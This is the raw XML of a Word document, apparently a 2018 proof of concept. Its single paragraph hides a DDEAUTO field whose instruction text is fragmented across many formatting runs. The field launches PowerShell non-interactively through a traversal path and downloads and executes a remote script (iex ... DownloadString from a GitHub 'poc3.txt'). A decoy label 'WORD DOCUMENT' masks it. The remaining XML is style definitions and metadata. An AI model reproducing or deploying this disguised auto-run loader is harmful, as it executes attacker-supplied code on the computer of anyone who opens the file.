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C3" w:rsidRPr="00A14280" w:rsidRDefault="00962544" w:rsidP="00A14280">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002B3797">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve">DDEAUTO </w:instrText>
      </w:r>
      <w:r w:rsidR="00271ABA">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="003E7F16">
        <w:rPr>
          <w:color w:val="DD1144"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8FF"/>
        </w:rPr>
        <w:instrText>C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe</w:instrText>
      </w:r>
      <w:r w:rsidR="003E7F16">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="002A4881">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve">-nop </w:instrText>
      </w:r>
      <w:r w:rsidR="002A4881">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1B1B1B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:instrText xml:space="preserve">-NonI </w:instrText>
      </w:r>
      <w:r w:rsidR="007C26EB">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText>$e=</w:instrText>
      </w:r>
      <w:r w:rsidR="00F93F8F" w:rsidRPr="00F93F8F">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText>iex(New-Object Net.WebClient).DownloadString('</w:instrText>
      </w:r>
      <w:r w:rsidR="00777A05" w:rsidRPr="00777A05">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText>https://raw.githubusercontent.com/G0D-SPAIN/Tests/master/poc</w:instrText>
      </w:r>
      <w:r w:rsidR="0066472C">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText>3</w:instrText>
      </w:r>
      <w:r w:rsidR="00777A05" w:rsidRPr="00777A05">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText>.txt</w:instrText>
      </w:r>
      <w:r w:rsidR="00205847">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText>')</w:instrText>
      </w:r>
      <w:r w:rsidR="00271ABA">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> # </w:instrText>
      </w:r>
      <w:r w:rsidR="00F93F8F">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00205847">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00B9369B" w:rsidRPr="00B9369B">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00B9369B">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText>WORD DOCUMENT</w:instrText>
      </w:r>
      <w:r w:rsidR="00B9369B" w:rsidRPr="00B9369B">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00DA7CB5">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="004F0DC3" w:rsidRPr="00A142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8B"/>
    <w:rsid w:val="000652FD"/>
    <w:rsid w:val="00065D76"/>
    <w:rsid w:val="00121916"/>
    <w:rsid w:val="00122CB1"/>
    <w:rsid w:val="00143482"/>
    <w:rsid w:val="0017236A"/>
    <w:rsid w:val="001A07EB"/>
    <w:rsid w:val="001C547D"/>
    <w:rsid w:val="001C7DE3"/>
    <w:rsid w:val="00205847"/>
    <w:rsid w:val="00265691"/>
    <w:rsid w:val="00271ABA"/>
    <w:rsid w:val="00273279"/>
    <w:rsid w:val="00281029"/>
    <w:rsid w:val="002A4881"/>
    <w:rsid w:val="002B3797"/>
    <w:rsid w:val="002E4B2E"/>
    <w:rsid w:val="00331374"/>
    <w:rsid w:val="003E49F9"/>
    <w:rsid w:val="003E7F16"/>
    <w:rsid w:val="00414A2D"/>
    <w:rsid w:val="00436A87"/>
    <w:rsid w:val="004718D6"/>
    <w:rsid w:val="00472D69"/>
    <w:rsid w:val="00475E2F"/>
    <w:rsid w:val="00496A90"/>
    <w:rsid w:val="004A4238"/>
    <w:rsid w:val="004F0DC3"/>
    <w:rsid w:val="004F46B6"/>
    <w:rsid w:val="005D6935"/>
    <w:rsid w:val="00602521"/>
    <w:rsid w:val="0066472C"/>
    <w:rsid w:val="006B00CF"/>
    <w:rsid w:val="006B47D2"/>
    <w:rsid w:val="0071388B"/>
    <w:rsid w:val="0073063D"/>
    <w:rsid w:val="0074640F"/>
    <w:rsid w:val="00757326"/>
    <w:rsid w:val="00777A05"/>
    <w:rsid w:val="007C26EB"/>
    <w:rsid w:val="00816DA8"/>
    <w:rsid w:val="00876561"/>
    <w:rsid w:val="00912728"/>
    <w:rsid w:val="009448DF"/>
    <w:rsid w:val="0094676C"/>
    <w:rsid w:val="00962544"/>
    <w:rsid w:val="009975A4"/>
    <w:rsid w:val="009B6EE6"/>
    <w:rsid w:val="009F45C2"/>
    <w:rsid w:val="00A14280"/>
    <w:rsid w:val="00A43061"/>
    <w:rsid w:val="00A608EA"/>
    <w:rsid w:val="00A83040"/>
    <w:rsid w:val="00AC0F0E"/>
    <w:rsid w:val="00AD30A5"/>
    <w:rsid w:val="00B022E4"/>
    <w:rsid w:val="00B1764C"/>
    <w:rsid w:val="00B36CBB"/>
    <w:rsid w:val="00B44810"/>
    <w:rsid w:val="00B65E59"/>
    <w:rsid w:val="00B9369B"/>
    <w:rsid w:val="00B9454B"/>
    <w:rsid w:val="00D45BDE"/>
    <w:rsid w:val="00D758B9"/>
    <w:rsid w:val="00DA0107"/>
    <w:rsid w:val="00DA7CB5"/>
    <w:rsid w:val="00DD0E4E"/>
    <w:rsid w:val="00DF597B"/>
    <w:rsid w:val="00E12CA6"/>
    <w:rsid w:val="00E15E8A"/>
    <w:rsid w:val="00E2199B"/>
    <w:rsid w:val="00E24437"/>
    <w:rsid w:val="00E9611A"/>
    <w:rsid w:val="00EF680B"/>
    <w:rsid w:val="00F90808"/>
    <w:rsid w:val="00F916A1"/>
    <w:rsid w:val="00F93F8F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8545D-6867-40B8-B2FD-720EA04A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652FD"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-sy">
    <w:name w:val="crayon-sy"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00121916"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-h">
    <w:name w:val="crayon-h"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00121916"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-i">
    <w:name w:val="crayon-i"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00121916"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-s">
    <w:name w:val="crayon-s"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00121916"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-v">
    <w:name w:val="crayon-v"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00A43061"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-o">
    <w:name w:val="crayon-o"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00A43061"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-e">
    <w:name w:val="crayon-e"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00A43061"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hipervnculo">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F90808"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="004F0DC3"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLconformatoprevio">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLconformatoprevioCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A14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428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1">
    <w:name w:val="s1"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00A1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E64F-5EFC-4691-A41B-BE2E770D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D</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>G0D</cp:lastModifiedBy>
  <cp:revision>33</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-03-03T17:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-03-05T00:03:00Z</dcterms:modified>
</cp:coreProperties>
</file>